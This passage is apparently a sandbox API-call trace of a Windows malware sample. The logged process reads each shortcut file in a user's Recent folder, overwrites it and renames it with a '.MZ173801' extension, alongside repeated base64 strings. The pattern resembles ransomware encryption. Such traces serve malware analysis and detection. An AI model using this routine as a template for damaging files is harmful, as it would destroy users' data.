5Rjg4REVEMDQ3QkE3OTE0MDVCRDFFODQ3RUYzRkE3ODlBMTA5==", lpUsedDefaultChar=0x0) returned 814 [0107.375] GetCurrentThreadId () returned 0x1358 [0107.375] GetCurrentThreadId () returned 0x1358 [0107.375] GetCurrentThreadId () returned 0x1358 [0107.375] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\Dfoi.lnk" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\windows\\recent\\dfoi.lnk"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x3f4 [0107.375] SetFilePointer (in: hFile=0x3f4, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f9a4*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x19f9a4*=0) returned 0x0 [0107.375] SetFilePointer (in: hFile=0x3f4, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f99c*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x19f99c*=0) returned 0x0 [0107.375] SetFilePointer (in: hFile=0x3f4, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f99c*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x19f99c*=0) returned 0x3b9 [0107.375] SetFilePointer (in: hFile=0x3f4, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f99c*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x19f99c*=0) returned 0x0 [0107.375] ReadFile (in: hFile=0x3f4, lpBuffer=0x2431b30, nNumberOfBytesToRead=0x3b9, lpNumberOfBytesRead=0x19f9b0, lpOverlapped=0x0 | out: lpBuffer=0x2431b30*, lpNumberOfBytesRead=0x19f9b0*=0x3b9, lpOverlapped=0x0) returned 1 [0107.657] CloseHandle (hObject=0x3f4) returned 1 [0107.659] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\Dfoi.lnk" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\windows\\recent\\dfoi.lnk"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x3f4 [0107.673] WriteFile (in: hFile=0x3f4, lpBuffer=0x2433b60*, nNumberOfBytesToWrite=0x3b9, lpNumberOfBytesWritten=0x19f9bc, lpOverlapped=0x0 | out: lpBuffer=0x2433b60*, lpNumberOfBytesWritten=0x19f9bc*=0x3b9, lpOverlapped=0x0) returned 1 [0107.675] CloseHandle (hObject=0x3f4) returned 1 [0107.676] MoveFileW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\Dfoi.lnk" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\windows\\recent\\dfoi.lnk"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\Dfoi.lnk.MZ173801" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\windows\\recent\\dfoi.lnk.mz173801")) returned 1 [0107.676] GetCurrentThreadId () returned 0x1358 [0107.676] GetCurrentThreadId () returned 0x1358 [0107.676] GetCurrentThreadId () returned 0x1358 [0107.677] GetCurrentThreadId () returned 0x1358 [0107.677] GetCurrentThreadId () returned 0x1358 [0107.677] GetCurrentThreadId () returned 0x1358 [0107.677] FindNextFileW (in: hFindFile=0xa1b738, lpFindFileData=0x19fae8 | out: lpFindFileData=0x19fae8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xea71cc0e, ftCreationTime.dwHighDateTime=0x1d5f12a, ftLastAccessTime.dwLowDateTime=0x9fcfcd57, ftLastAccessTime.dwHighDateTime=0x1d5fb6e, ftLastWriteTime.dwLowDateTime=0x9fcfcd57, ftLastWriteTime.dwHighDateTime=0x1d5fb6e, nFileSizeHigh=0x0, nFileSizeLow=0x382, dwReserved0=0x4988e787, dwReserved1=0x0, cFileName="di1GF8YsdAcjrR-s.lnk", cAlternateFileName="DI1GF8~1.LNK")) returned 1 [0107.677] FileTimeToLocalFileTime (in: lpFileTime=0x19fafc, lpLocalFileTime=0x19fa5c | out: lpLocalFileTime=0x19fa5c) returned 1 [0107.677] FileTimeToDosDateTime (in: lpFileTime=0x19fa5c, lpFatDate=0x19faca, lpFatTime=0x19fac8 | out: lpFatDate=0x19faca, lpFatTime=0x19fac8) returned 1 [0107.677] GetFileAttributesExW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\di1GF8YsdAcjrR-s.lnk" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\windows\\recent\\di1gf8ysdacjrr-s.lnk"), fInfoLevelId=0x0, lpFileInformation=0x19f9f0 | out: lpFileInformation=0x19f9f0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xea71cc0e, ftCreationTime.dwHighDateTime=0x1d5f12a, ftLastAccessTime.dwLowDateTime=0x9fcfcd57, ftLastAccessTime.dwHighDateTime=0x1d5fb6e, ftLastWriteTime.dwLowDateTime=0x9fcfcd57, ftLastWriteTime.dwHighDateTime=0x1d5fb6e, nFileSizeHigh=0x0, nFileSizeLow=0x382)) returned 1 [0107.677] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="N0JEMDVEMkQ1QzdFMEE4NEY1M0JCODZFM0Q2MzZDQTgzN0RFODU3MTFFMTIyNUJDMjc5RjAxRENDMDE0NDI1M0IxQUE2RjI3MDY3NjQ4RkVBNUY2MkNFNzY2NjRBMDkzNzA5OUY1ODkwRjQ4MzMwQjU2MjU4NzVERDU2Rjc1NDkzMDczNzI2MjdFNDg1MDRCNzNCMjgxNUNFRTJCMUQxRTAwMDYxM0M5QkI2QzcyNUY1QkM1OUE5MUUxRUE1Q0EyMjc1MTA0NTlDNkE3Rjc1RkEzMkUyNUY4MEIwOEFGN0IyMTY2NjRGODgwNDlENDk4NjQ0QkI1RUM1NjFFRkNGOUZDOUI3M0VGODVCQjY5MzJCRTIxQkUxOTY5QkY5NDdGODAxOTgyRjIyRjQxQUQxODM1ODVBNkI3REFCQTlGMEQ1N0JERDMyOTc1QkMwMjNGNzJCMzEzNjFDOTA4NTBFNEYxRDc5QUY3NUNDOTYzNDRBNEM3OEZFRjU3REVDMUUxNDM4ODFCNTA3NTVDNjVGOEYwNTM3MkI4M0U0RDc4RjU2ODg4QUQ3OTRGODlENEU2RUQ5OTg4NjNGOUIxNjNEQ0UxMTA5NzAzRTg2QzY3NjA1QzkwM0IyN0ZGQTAxOTE1NTE0RDQyMjE0NzZFRkVERDUwQjQzOTc5MzRERDdCNUFCNEJFMDYyMzI0RjMyMjhGMzE0MjAxM0U5OEY0MzFGODQ5QTcyMEZBMDJCOUY2N0I4RTFBNjM5OUJDMEY1MDQ4NzZGRDFDQjUwNDVCMDVCMTRCOTBERTZFRjkwMTYzNzgw==", cchWideChar=814, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 814 [0107.677] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="N0JEMDVEMkQ1QzdFMEE4NEY1M0JCODZFM0Q2MzZDQTgzN0RFODU3MTFFMTIyNUJDMjc5RjAxRENDMDE0NDI1M0IxQUE2RjI3MDY3NjQ4RkVBNUY2MkNFNzY2NjRBMDkzNzA5OUY1ODkwRjQ4MzMwQjU2MjU4NzVERDU2Rjc1NDkzMDczNzI2MjdFNDg1MDRCNzNCMjgxNUNFRTJCMUQxRTAwMDYxM0M5QkI2QzcyNUY1QkM1OUE5MUUxRUE1Q0EyMjc1MTA0NTlDNkE3Rjc1RkEzMkUyNUY4MEIwOEFGN0IyMTY2NjRGODgwNDlENDk4NjQ0QkI1RUM1NjFFRkNGOUZDOUI3M0VGODVCQjY5MzJCRTIxQkUxOTY5QkY5NDdGODAxOTgyRjIyRjQxQUQxODM1ODVBNkI3REFCQTlGMEQ1N0JERDMyOTc1QkMwMjNGNzJCMzEzNjFDOTA4NTBFNEYxRDc5QUY3NUNDOTYzNDRBNEM3OEZFRjU3REVDMUUxNDM4ODFCNTA3NTVDNjVGOEYwNTM3MkI4M0U0RDc4RjU2ODg4QUQ3OTRGODlENEU2RUQ5OTg4NjNGOUIxNjNEQ0UxMTA5NzAzRTg2QzY3NjA1QzkwM0IyN0ZGQTAxOTE1NTE0RDQyMjE0NzZFRkVERDUwQjQzOTc5MzRERDdCNUFCNEJFMDYyMzI0RjMyMjhGMzE0MjAxM0U5OEY0MzFGODQ5QTcyMEZBMDJCOUY2N0I4RTFBNjM5OUJDMEY1MDQ4NzZGRDFDQjUwNDVCMDVCMTRCOTBERTZFRjkwMTYzNzgw==", cchWideChar=814, lpMultiByteStr=0x242762c, cbMultiByte=814, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="N0JEMDVEMkQ1QzdFMEE4NEY1M0JCODZFM0Q2MzZDQTgzN0RFODU3MTFFMTIyNUJDMjc5RjAxRENDMDE0NDI1M0IxQUE2RjI3MDY3NjQ4RkVBNUY2MkNFNzY2NjRBMDkzNzA5OUY1ODkwRjQ4MzMwQjU2MjU4NzVERDU2Rjc1NDkzMDczNzI2MjdFNDg1MDRCNzNCMjgxNUNFRTJCMUQxRTAwMDYxM0M5QkI2QzcyNUY1QkM1OUE5MUUxRUE1Q0EyMjc1MTA0NTlDNkE3Rjc1RkEzMkUyNUY4MEIwOEFGN0IyMTY2NjRGODgwNDlENDk4NjQ0QkI1RUM1NjFFRkNGOUZDOUI3M0VGODVCQjY5MzJCRTIxQkUxOTY5QkY5NDdGODAxOTgyRjIyRjQxQUQxODM1ODVBNkI3REFCQTlGMEQ1N0JERDMyOTc1QkMwMjNGNzJCMzEzNjFDOTA4NTBFNEYxRDc5QUY3NUNDOTYzNDRBNEM3OEZFRjU3REVDMUUxNDM4ODFCNTA3NTVDNjVGOEYwNTM3MkI4M0U0RDc4RjU2ODg4QUQ3OTRGODlENEU2RUQ5OTg4NjNGOUIxNjNEQ0UxMTA5NzAzRTg2QzY3NjA1QzkwM0IyN0ZGQTAxOTE1NTE0RDQyMjE0NzZFRkVERDUwQjQzOTc5MzRERDdCNUFCNEJFMDYyMzI0RjMyMjhGMzE0MjAxM0U5OEY0MzFGODQ5QTcyMEZBMDJCOUY2N0I4RTFBNjM5OUJDMEY1MDQ4NzZGRDFDQjUwNDVCMDVCMTRCOTBERTZFRjkwMTYzNzgw==", lpUsedDefaultChar=0x0) returned 814 [0107.678] GetCurrentThreadId () returned 0x1358 [0107.678] GetCurrentThreadId () returned 0x1358 [0107.678] GetCurrentThreadId () returned 0x1358 [0107.678] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="RDRCRkI1MEI1MDQxNjI1Nzc3NjdBRTA2Q0MxNzc0M0E0OUZEOTIyRTMzQTM5NzZDMkJEMDExNTc4NUYxREE0Q0U4N0ZFQzIxRDAxQjFDMDZGMkJBNTM3OTRDRTNFNjYzNDY2ODVCQUIyNjFDODdEMTZGOTdBRjE2Q0Q0OUMwMEY0RDAyODlBMjQ4ODQxRDc3NjBDMkNBNERENkRFNTBCQTczNjE5ODAzNDc4M0RGREE3QThFQUFGRjQ3QkQ0QjE4Qzc2RURGMkQyOEI3OURGOUJEMDI2RDgwRUY4RjAyMEFDMUQ4QzkxMzAwMURGMzBGODAzRjk1M0E5MjJFRTM3QzgyODk1ODc5MDUxMTQ5MzIxNzFEQ0FDNjMyRTJCQTk1ODQxRjgxQjk0RjYxOTYxMEVDNkIxOTgzQTM5MzQxOTdFQkUwQzBDRUU3MzZERTE3RjNERUI0ODNCQzQ3MkVFRjI0N0FCNzQ5MDcyQ0EzMEUwOTE0MzI4QjcxNjQ4NDA3ODQwMzNBNkJEQjBENjJDNjE2OTE1MEQzQkRGMDc2OTI3Q0M2NzYyQTdGNTA0ODRFQzlBMDEwNjY2NzJGQzA4MDMzQzZFQkZGMzFBRjNEQUU0Qjk2RTlEMzhCQjUwRkJBN0NGRjNFMjc0MTMwRTYyQjQwOUMzODZDMDVBNjlCMzczMjQxNUI2MkRFN0JEODQzRDM5NEZEMDdGMTczNzk2ODQ5NTc4MTMxMkE1NTMzOTJCOEE3NDExQjRERkU5Rjg4REVEMDQ3QkE3OTE0MDVCRDFFODQ3RUYzRkE3ODlBMTA5==", cchWideChar=814, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 814 [0107.678] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="RDRCRkI1MEI1MDQxNjI1Nzc3NjdBRTA2Q0MxNzc0M0E0OUZEOTIyRTMzQTM5NzZDMkJEMDExNTc4NUYxREE0Q0U4N0ZFQzIxRDAxQjFDMDZGMkJBNTM3OTRDRTNFNjYzNDY2ODVCQUIyNjFDODdEMTZGOTdBRjE2Q0Q0OUMwMEY0RDAyODlBMjQ4ODQxRDc3NjBDMkNBNERENkRFNTBCQTczNjE5ODAzNDc4M0RGREE3QThFQUFGRjQ3QkQ0QjE4Qzc2RURGMkQyOEI3OURGOUJEMDI2RDgwRUY4RjAyMEFDMUQ4QzkxMzAwMURGMzBGODAzRjk1M0E5MjJFRTM3QzgyODk1ODc5MDUxMTQ5MzIxNzFEQ0FDNjMyRTJCQTk1ODQxRjgxQjk0RjYxOTYxMEVDNkIxOTgzQTM5MzQxOTdFQkUwQzBDRUU3MzZERTE3RjNERUI0ODNCQzQ3MkVFRjI0N0FCNzQ5MDcyQ0EzMEUwOTE0MzI4QjcxNjQ4NDA3ODQwMzNBNkJEQjBENjJDNjE2OTE1MEQzQkRGMDc2OTI3Q0M2NzYyQTdGNTA0ODRFQzlBMDEwNjY2NzJGQzA4MDMzQzZFQkZGMzFBRjNEQUU0Qjk2RTlEMzhCQjUwRkJBN0NGRjNFMjc0MTMwRTYyQjQwOUMzODZDMDVBNjlCMzczMjQxNUI2MkRFN0JEODQzRDM5NEZEMDdGMTczNzk2ODQ5NTc4MTMxMkE1NTMzOTJCOEE3NDExQjRERkU5Rjg4REVEMDQ3QkE3OTE0MDVCRDFFODQ3RUYzRkE3ODlBMTA5==", cchWideChar=814, lpMultiByteStr=0x242799c, cbMultiByte=814, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="RDRCRkI1MEI1MDQxNjI1Nzc3NjdBRTA2Q0MxNzc0M0E0OUZEOTIyRTMzQTM5NzZDMkJEMDExNTc4NUYxREE0Q0U4N0ZFQzIxRDAxQjFDMDZGMkJBNTM3OTRDRTNFNjYzNDY2ODVCQUIyNjFDODdEMTZGOTdBRjE2Q0Q0OUMwMEY0RDAyODlBMjQ4ODQxRDc3NjBDMkNBNERENkRFNTBCQTczNjE5ODAzNDc4M0RGREE3QThFQUFGRjQ3QkQ0QjE4Qzc2RURGMkQyOEI3OURGOUJEMDI2RDgwRUY4RjAyMEFDMUQ4QzkxMzAwMURGMzBGODAzRjk1M0E5MjJFRTM3QzgyODk1ODc5MDUxMTQ5MzIxNzFEQ0FDNjMyRTJCQTk1ODQxRjgxQjk0RjYxOTYxMEVDNkIxOTgzQTM5MzQxOTdFQkUwQzBDRUU3MzZERTE3RjNERUI0ODNCQzQ3MkVFRjI0N0FCNzQ5MDcyQ0EzMEUwOTE0MzI4QjcxNjQ4NDA3ODQwMzNBNkJEQjBENjJDNjE2OTE1MEQzQkRGMDc2OTI3Q0M2NzYyQTdGNTA0ODRFQzlBMDEwNjY2NzJGQzA4MDMzQzZFQkZGMzFBRjNEQUU0Qjk2RTlEMzhCQjUwRkJBN0NGRjNFMjc0MTMwRTYyQjQwOUMzODZDMDVBNjlCMzczMjQxNUI2MkRFN0JEODQzRDM5NEZEMDdGMTczNzk2ODQ5NTc4MTMxMkE1NTMzOTJCOEE3NDExQjRERkU5Rjg4REVEMDQ3QkE3OTE0MDVCRDFFODQ3RUYzRkE3ODlBMTA5==", lpUsedDefaultChar=0x0) returned 814 [0107.679] GetCurrentThreadId () returned 0x1358 [0107.679] GetCurrentThreadId () returned 0x1358 [0107.679] GetCurrentThreadId () returned 0x1358 [0107.679] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\di1GF8YsdAcjrR-s.lnk" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\windows\\recent\\di1gf8ysdacjrr-s.lnk"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x3f4 [0107.679] SetFilePointer (in: hFile=0x3f4, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f9a4*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x19f9a4*=0) returned 0x0 [0107.679] SetFilePointer (in: hFile=0x3f4, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f99c*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x19f99c*=0) returned 0x0 [0107.679] SetFilePointer (in: hFile=0x3f4, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f99c*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x19f99c*=0) returned 0x382 [0107.679] SetFilePointer (in: hFile=0x3f4, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f99c*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x19f99c*=0) returned 0x0 [0107.680] ReadFile (in: hFile=0x3f4, lpBuffer=0x2432c60, nNumberOfBytesToRead=0x382, lpNumberOfBytesRead=0x19f9b0, lpOverlapped=0x0 | out: lpBuffer=0x2432c60*, lpNumberOfBytesRead=0x19f9b0*=0x382, lpOverlapped=0x0) returned 1 [0107.680] CloseHandle (hObject=0x3f4) returned 1 [0107.681] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\di1GF8YsdAcjrR-s.lnk" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\windows\\recent\\di1gf8ysdacjrr-s.lnk"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x3f4 [0107.682] WriteFile (in: hFile=0x3f4, lpBuffer=0x2434c90*, nNumberOfBytesToWrite=0x382, lpNumberOfBytesWritten=0x19f9bc, lpOverlapped=0x0 | out: lpBuffer=0x2434c90*, lpNumberOfBytesWritten=0x19f9bc*=0x382, lpOverlapped=0x0) returned 1 [0107.683] CloseHandle (hObject=0x3f4) returned 1 [0107.684] MoveFileW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\di1GF8YsdAcjrR-s.lnk" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\windows\\recent\\di1gf8ysdacjrr-s.lnk"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\di1GF8YsdAcjrR-s.lnk.MZ173801" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\windows\\recent\\di1gf8ysdacjrr-s.lnk.mz173801")) returned 1 [0107.685] GetCurrentThreadId () returned 0x1358 [0107.685] GetCurrentThreadId () returned 0x1358 [0107.685] GetCurrentThreadId () returned 0x1358 [0107.685] GetCurrentThreadId () returned 0x1358 [0107.685] GetCurrentThreadId () returned 0x1358 [0107.685] GetCurrentThreadId () returned 0x1358 [0107.685] FindNextFileW (in: hFindFile=0xa1b738, lpFindFileData=0x19fae8 | out: lpFindFileData=0x19fae8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xeadb10bc, ftCreationTime.dwHighDateTime=0x1d5f12a, ftLastAccessTime.dwLowDateTime=0x9c058eb8, ftLastAccessTime.dwHighDateTime=0x1d5fb6e, ftLastWriteTime.dwLowDateTime=0x9c058eb8, ftLastWriteTime.dwHighDateTime=0x1d5fb6e, nFileSizeHigh=0x0, nFileSizeLow=0x408, dwReserved0=0x4988e787, dwReserved1=0x0, cFileName="dQSfhEFRy_gFg.lnk", cAlternateFileName="DQSFHE~1.LNK")) returned 1 [0107.685] FileTimeToLocalFileTime (in: lpFileTime=0x19fafc, lpLocalFileTime=0x19fa5c | out: lpLocalFileTime=0x19fa5c) returned 1 [0107.685] FileTimeToDosDateTime (in: lpFileTime=0x19fa5c, lpFatDate=0x19faca, lpFatTime=0x19fac8 | out: lpFatDate=0x19faca, lpFatTime=0x19fac8) returned 1 [0107.685] GetFileAttributesExW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\dQSfhEFRy_gFg.lnk" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\windows\\recent\\dqsfhefry_gfg.lnk"), fInfoLevelId=0x0, lpFileInformation=0x19f9f0 | out: lpFileInformation=0x19f9f0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xeadb10bc, ftCreationTime.dwHighDateTime=0x1d5f12a, ftLastAccessTime.dwLowDateTime=0x9c058eb8, ftLastAccessTime.dwHighDateTime=0x1d5fb6e, ftLastWriteTime.dwLowDateTime=0x9c058eb8, ftLastWriteTime.dwHighDateTime=0x1d5fb6e, nFileSizeHigh=0x0, nFileSizeLow=0x408)) returned 1 [0107.686] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="N0JEMDVEMkQ1QzdFMEE4NEY1M0JCODZFM0Q2MzZDQTgzN0RFODU3MTFFMTIyNUJDMjc5RjAxRENDMDE0NDI1M0IxQUE2RjI3MDY3NjQ4RkVBNUY2MkNFNzY2NjRBMDkzNzA5OUY1ODkwRjQ4MzMwQjU2MjU4NzVERDU2Rjc1NDkzMDczNzI2MjdFNDg1MDRCNzNCMjgxNUNFRTJCMUQxRTAwMDYxM0M5QkI2QzcyNUY1QkM1OUE5MUUxRUE1Q0EyMjc1MTA0NTlDNkE3Rjc1RkEzMkUyNUY4MEIwOEFGN0IyMTY2NjRGODgwNDlENDk4NjQ0QkI1RUM1NjFFRkNGOUZDOUI3M0VGODVCQjY5MzJCRTIxQkUxOTY5QkY5NDdGODAxOTgyRjIyRjQxQUQxODM1ODVBNkI3REFCQTlGMEQ1N0JERDMyOTc1QkMwMjNGNzJCMzEzNjFDOTA4NTBFNEYxRDc5QUY3NUNDOTYzNDRBNEM3OEZFRjU3REVDMUUxNDM4ODFCNTA3NTVDNjVGOEYwNTM3MkI4M0U0RDc4RjU2ODg4QUQ3OTRGODlENEU2RUQ5OTg4NjNGOUIxNjNEQ0UxMTA5NzAzRTg2QzY3NjA1QzkwM0IyN0ZGQTAxOTE1NTE0RDQyMjE0NzZFRkVERDUwQjQzOTc5MzRERDdCNUFCNEJFMDYyMzI0RjMyMjhGMzE0MjAxM0U5OEY0MzFGODQ5QTcyMEZBMDJCOUY2N0I4RTFBNjM5OUJDMEY1MDQ4NzZGRDFDQjUwNDVCMDVCMTRCOTBERTZFRjkwMTYzNzgw==", cchWideChar=814, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 814 [0107.686] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="N0JEMDVEMkQ1QzdFMEE4NEY1M0JCODZFM0Q2MzZDQTgzN0RFODU3MTFFMTIyNUJDMjc5RjAxRENDMDE0NDI1M0IxQUE2RjI3MDY3NjQ4RkVBNUY2MkNFNzY2NjRBMDkzNzA5OUY1ODkwRjQ4MzMwQjU2MjU4NzVERDU2Rjc1NDkzMDczNzI2MjdFNDg1MDRCNzNCMjgxNUNFRTJCMUQxRTAwMDYxM0M5QkI2QzcyNUY1QkM1OUE5MUUxRUE1Q0EyMjc1MTA0NTlDNkE3Rjc1RkEzMkUyNUY4MEIwOEFGN0IyMTY2NjRGODgwNDlENDk4NjQ0QkI1RUM1NjFFRkNGOUZDOUI3M0VGODVCQjY5MzJCRTIxQkUxOTY5QkY5NDdGODAxOTgyRjIyRjQxQUQxODM1ODVBNkI3REFCQTlGMEQ1N0JERDMyOTc1QkMwMjNGNzJCMzEzNjFDOTA4NTBFNEYxRDc5QUY3NUNDOTYzNDRBNEM3OEZFRjU3REVDMUUxNDM4ODFCNTA3NTVDNjVGOEYwNTM3MkI4M0U0RDc4RjU2ODg4QUQ3OTRGODlENEU2RUQ5OTg4NjNGOUIxNjNEQ0UxMTA5NzAzRTg2QzY3NjA1QzkwM0IyN0ZGQTAxOTE1NTE0RDQyMjE0NzZFRkVERDUwQjQzOTc5MzRERDdCNUFCNEJFMDYyMzI0RjMyMjhGMzE0MjAxM0U5OEY0MzFGODQ5QTcyMEZBMDJCOUY2N0I4RTFBNjM5OUJDMEY1MDQ4NzZGRDFDQjUwNDVCMDVCMTRCOTBERTZFRjkwMTYzNzgw==", cchWideChar=814, lpMultiByteStr=0x242762c, cbMultiByte=814, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="N0JEMDVEMkQ1QzdFMEE4NEY1M0JCODZFM0Q2MzZDQTgzN0RFODU3MTFFMTIyNUJDMjc5RjAxRENDMDE0NDI1M0IxQUE2RjI3MDY3NjQ4RkVBNUY2MkNFNzY2NjRBMDkzNzA5OUY1ODkwRjQ4MzMwQjU2MjU4NzVERDU2Rjc1NDkzMDczNzI2MjdFNDg1MDRCNzNCMjgxNUNFRTJCMUQxRTAwMDYxM0M5QkI2QzcyNUY1QkM1OUE5MUUxRUE1Q0EyMjc1MTA0NTlDNkE3Rjc1RkEzMkUyNUY4MEIwOEFGN0IyMTY2NjRGODgwNDlENDk4NjQ0QkI1RUM1NjFFRkNGOUZDOUI3M0VGODVCQjY5MzJCRTIxQkUxOTY5QkY5NDdGODAxOTgyRjIyRjQxQUQxODM1ODVBNkI3REFCQTlGMEQ1N0JERDMyOTc1QkMwMjNGNzJCMzEzNjFDOTA4NTBFNEYxRDc5QUY3NUNDOTYzNDRBNEM3OEZFRjU3REVDMUUxNDM4ODFCNTA3NTVDNjVGOEYwNTM3MkI4M0U0RDc4RjU2ODg4QUQ3OTRGODlENEU2RUQ5OTg4NjNGOUIxNjNEQ0UxMTA5NzAzRTg2QzY3NjA1QzkwM0IyN0ZGQTAxOTE1NTE0RDQyMjE0NzZFRkVERDUwQjQzOTc5MzRERDdCNUFCNEJFMDYyMzI0RjMyMjhGMzE0MjAxM0U5OEY0MzFGODQ5QTcyMEZBMDJCOUY2N0I4RTFBNjM5OUJDMEY1MDQ4NzZGRDFDQjUwNDVCMDVCMTRCOTBERTZFRjkwMTYzNzgw==", lpUsedDefaultChar=0x0) returned 814 [0107.686] GetCurrentThreadId () returned 0x1358 [0107.686] GetCurrentThreadId () returned 0x1358 [0107.686] GetCurrentThreadId () returned 0x1358 [0107.687] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="RDRCRkI1MEI1MDQxNjI1Nzc3NjdBRTA2Q0MxNzc0M0E0OUZEOTIyRTMzQTM5NzZDMkJEMDExNTc4NUYxREE0Q0U4N0ZFQzIxRDAxQjFDMDZGMkJBNTM3OTRDRTNFNjYzNDY2ODVCQUIyNjFDODdEMTZGOTdBRjE2Q0Q0OUMwMEY0RDAyODlBMjQ4ODQxRDc3NjBDMkNBNERENkRFNTBCQTczNjE5ODAzNDc4M0RGREE3QThFQUFGRjQ3QkQ0QjE4Qzc2RURGMkQyOEI3OURGOUJEMDI2RDgwRUY4RjAyMEFDMUQ4QzkxMzAwMURGMzBGODAzRjk1M0E5MjJFRTM3QzgyODk1ODc5MDUxMTQ5MzIxNzFEQ0FDNjMyRTJCQTk1ODQxRjgxQjk0RjYxOTYxMEVDNkIxOTgzQTM5MzQxOTdFQkUwQzBDRUU3MzZERTE3RjNERUI0ODNCQzQ3MkVFRjI0N0FCNzQ5MDcyQ0EzMEUwOTE0MzI4QjcxNjQ4NDA3ODQwMzNBNkJEQjBENjJDNjE2OTE1MEQzQkRGMDc2OTI3Q0M2NzYyQTdGNTA0ODRFQzlBMDEwNjY2NzJGQzA4MDMzQzZFQkZGMzFBRjNEQUU0Qjk2RTlEMzhCQjUwRkJBN0NGRjNFMjc0MTMwRTYyQjQwOUMzODZDMDVBNjlCMzczMjQxNUI2MkRFN0JEODQzRDM5NEZEMDdGMTczNzk2ODQ5NTc4MTMxMkE1NTMzOTJCOEE3NDExQjRERkU5Rjg4REVEMDQ3QkE3OTE0MDVCRDFFODQ3RUYzRkE3ODlBMTA5==", cchWideChar=814, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 814 [0107.687] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, 